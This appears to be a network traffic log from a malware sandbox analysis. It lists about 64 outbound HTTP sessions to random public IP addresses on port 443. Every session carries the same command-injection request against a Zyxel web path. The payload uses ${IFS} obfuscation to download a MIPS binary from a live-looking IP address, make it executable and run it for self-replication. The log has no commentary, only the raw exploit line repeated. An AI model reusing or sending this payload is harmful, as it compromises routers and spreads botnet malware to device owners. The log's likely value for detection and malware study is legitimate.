                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906455994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3070192.168.2.1436064164.224.226.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906500101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3071192.168.2.144218646.97.20.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906518936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3072192.168.2.1457704209.78.218.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906574965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3073192.168.2.144736650.154.171.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906610966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3074192.168.2.145344261.52.33.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906646013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3075192.168.2.145446438.98.118.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906676054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3076192.168.2.144866862.103.24.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906734943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3077192.168.2.1457684208.39.176.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906789064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3078192.168.2.1459410208.138.97.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906842947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3079192.168.2.1434642117.211.175.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906892061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3080192.168.2.1449668167.64.28.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906927109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3081192.168.2.1439422168.7.71.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.906968117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3082192.168.2.146069440.40.173.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907011032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3083192.168.2.144544023.27.131.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907108068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3084192.168.2.143754681.78.241.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907135963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3085192.168.2.143506247.168.176.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907162905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3086192.168.2.144297695.232.139.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907193899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3087192.168.2.143498285.238.113.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907247066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3088192.168.2.1459380135.28.123.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907289028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3089192.168.2.145546275.194.117.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907306910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3090192.168.2.1458682206.158.214.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907342911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3091192.168.2.143333638.33.245.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907402992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3092192.168.2.1455456209.70.122.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907432079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3093192.168.2.1444826197.118.27.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907464981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3094192.168.2.144401650.113.12.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907496929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3095192.168.2.1437788181.142.86.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907531023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3096192.168.2.1453164219.237.170.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907573938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3097192.168.2.1438528201.12.5.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907613993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3098192.168.2.1459090210.52.33.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907649040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3099192.168.2.1434638159.239.188.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907697916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3100192.168.2.1435604129.81.26.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907736063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3101192.168.2.1457336201.223.116.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907747984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3102192.168.2.1456486147.74.210.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907814026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3103192.168.2.1451872134.85.28.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907843113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3104192.168.2.144392423.205.185.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907867908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3105192.168.2.1445606176.182.95.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907916069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3106192.168.2.1439166124.198.90.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907953978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3107192.168.2.1450836161.170.47.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.907987118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3108192.168.2.1443878207.61.49.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908031940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3109192.168.2.1437762140.106.143.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908076048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3110192.168.2.143545290.166.223.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908103943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3111192.168.2.1444592139.156.178.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908139944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3112192.168.2.1445432173.254.99.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908184052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3113192.168.2.1442946201.163.210.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908221006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3114192.168.2.1439028153.75.192.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908267021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3115192.168.2.1458674165.244.3.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908305883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3116192.168.2.1443024167.203.206.158443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908350945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3117192.168.2.1441246124.23.200.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908385992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3118192.168.2.1459076189.233.212.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908407927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3119192.168.2.1441816193.251.26.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908453941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3120192.168.2.144728424.114.75.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908480883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3121192.168.2.1446328183.177.157.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908524036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3122192.168.2.1456052192.21.158.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908565998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3123192.168.2.1446284201.236.48.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908597946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3124192.168.2.143931698.24.9.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908616066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3125192.168.2.145891295.122.47.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908649921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3126192.168.2.144538646.79.54.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908699989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3127192.168.2.144211832.121.150.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908730030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3128192.168.2.1446624120.83.140.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908785105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3129192.168.2.1436506201.71.63.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908823013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3130192.168.2.1459706114.145.117.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908859968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3131192.168.2.1454402188.91.80.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908885002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3132192.168.2.144370624.38.177.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:44.908917904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              3133192.168.2.145080298.240.210.63443
                                              TimestampBytes transferredDirectionData
